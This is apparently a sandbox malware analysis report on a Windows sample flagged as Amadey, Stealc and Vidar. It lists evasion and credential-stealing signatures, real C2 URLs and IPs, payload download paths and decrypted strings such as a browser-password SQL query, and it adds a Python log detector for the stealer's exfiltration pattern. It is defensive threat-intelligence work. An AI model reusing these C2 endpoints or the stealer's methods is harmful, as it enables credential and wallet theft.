Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483424
MD5: 7e43d787c0813212855c05d5cc4b1752
SHA1: 3b1dc23a3db66ca9f98742f379fde849a1039a67
SHA256: 5eb4e0358569874385f1f29eeb4f296ce648be45cc6ea62328e8a9594571859f
Tags: exe, Stealc

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Amadey's stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth, Stealc is a non-resident stealer with flexible data collection settings whose development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Vidar Vidar is a fork of Arkei. It appears to be one of the first stealers to grab information on 2FA software and the Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
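An added example, not part of the Joe Sandbox report or of any tool it lists: a small Python detection that turns the Stealc behaviour described above (seven legitimate browser-decryption DLLs fetched from the C2, then file-by-file HTTP POST exfiltration to the same host) into logic that runs over proxy log lines. The log format, the threshold and time window, and the updates.example.com host are my assumptions; the sample lines are constructed, modelled on the 85.28.47.31 download path and gate URL seen in this report.

```python
"""Added example, not part of the Joe Sandbox report or of any of the tools
it lists. Flags the Stealc/Vidar staging pattern from the Classification
table: one host serving several of the seven browser-decryption DLLs to one
client inside a short window, followed by POSTs to that same host.

Assumed log format (my assumption): '<unix_ts> <client_ip> <method> <url> <status>'.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# The seven legitimate DLLs the report says Stealc downloads.
STEALER_DLLS = {
    "sqlite3.dll", "nss3.dll", "vcruntime140.dll", "mozglue.dll",
    "freebl3.dll", "softokn3.dll", "msvcp140.dll",
}
# One of these from a software updater is normal; several from one host to
# one client within minutes is the stealer staging its helper DLLs.
THRESHOLD = 3
WINDOW_SECONDS = 300

# Constructed sample lines modelled on the download URLs in this report.
# updates.example.com stands in for a legitimate updater (assumed host).
SAMPLE_LOG = """\
1720000000 10.0.0.5 GET http://85.28.47.31/8405906461a5200c/vcruntime140.dll 200
1720000001 10.0.0.5 GET http://85.28.47.31/8405906461a5200c/nss3.dll 200
1720000001 10.0.0.5 GET http://85.28.47.31/8405906461a5200c/freebl3.dll 200
1720000002 10.0.0.5 GET http://85.28.47.31/8405906461a5200c/softokn3.dll 200
1720000003 10.0.0.5 POST http://85.28.47.31/5499d72b3a3e55be.php 200
1720000010 10.0.0.7 GET http://updates.example.com/pkg/vcruntime140.dll 200
1720000020 10.0.0.7 POST http://updates.example.com/telemetry 200
""".splitlines()


def parse_line(line):
    ts, client, method, url, status = line.split()
    return int(ts), client, method, url, status


def find_dll_staging(log_lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {(client, host): [dll, ...]} for every client/host pair that
    fetched at least `threshold` distinct stealer DLLs within `window` seconds."""
    fetches = defaultdict(list)            # (client, host) -> [(ts, dll)]
    for ts, client, method, url, _ in map(parse_line, log_lines):
        if method != "GET":
            continue
        parts = urlsplit(url)
        name = parts.path.rsplit("/", 1)[-1].lower()
        if name in STEALER_DLLS:
            fetches[(client, parts.netloc)].append((ts, name))

    hits = {}
    for key, events in fetches.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            names = {n for t, n in events[i:] if t - t0 <= window}
            if len(names) >= threshold:
                hits[key] = sorted(names)
                break
    return hits


def exfil_candidates(log_lines, staging):
    """POSTs from a flagged client to the host that staged its DLLs: the
    per-file HTTP POST exfiltration the Stealc description mentions."""
    return [url for _, client, method, url, _ in map(parse_line, log_lines)
            if method == "POST" and (client, urlsplit(url).netloc) in staging]


if __name__ == "__main__":
    staged = find_dll_staging(SAMPLE_LOG)
    for (client, host), dlls in staged.items():
        print(f"{client} pulled {len(dlls)} stealer DLLs from {host}: {', '.join(dlls)}")
    for url in exfil_candidates(SAMPLE_LOG, staged):
        print(f"possible exfil gate: {url}")
```

The single vcruntime140.dll fetched by 10.0.0.7 from the updater host stays below the threshold, which is the point of counting distinct DLL names per client/host pair rather than alerting on any one of these common file names. The POST that follows the staging is the same host's .php gate, which is also where the StealC configuration extractor in this report points.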

AV Detection

Source: file.exe Avira: detected
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.16/a=t Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpOb Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllO Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php/b3 Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpOe Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllc Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php_b# Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/;1 Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php/1 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR= Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/=1 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/soka/random.exeb3 Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Source: http://185.215.113.16/stealc/random.exe- Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exe/ Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php% Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.php3 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userAAKKKEBFCG.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: 9fa327eb6c.exe.7968.21.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7652.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Virustotal: Detection: 17% Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Virustotal: Detection: 8% Perma Link
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllO Virustotal: Detection: 23% Perma Link
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Virustotal: Detection: 17% Perma Link
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Virustotal: Detection: 9% Perma Link
Source: file.exe Virustotal: Detection: 42% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\userAAKKKEBFCG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 22
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 08
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 20
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 24
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Sleep
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: user32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sscanf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: silence
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sila
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32Next
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32First
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindClose
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WriteFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLastError
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SelectObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BitBlt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrStrA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmStartSession
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmGetList
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RmEndSession
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_open
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_step
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_close
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: encrypted_key
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PATH
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: NSS_Init
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
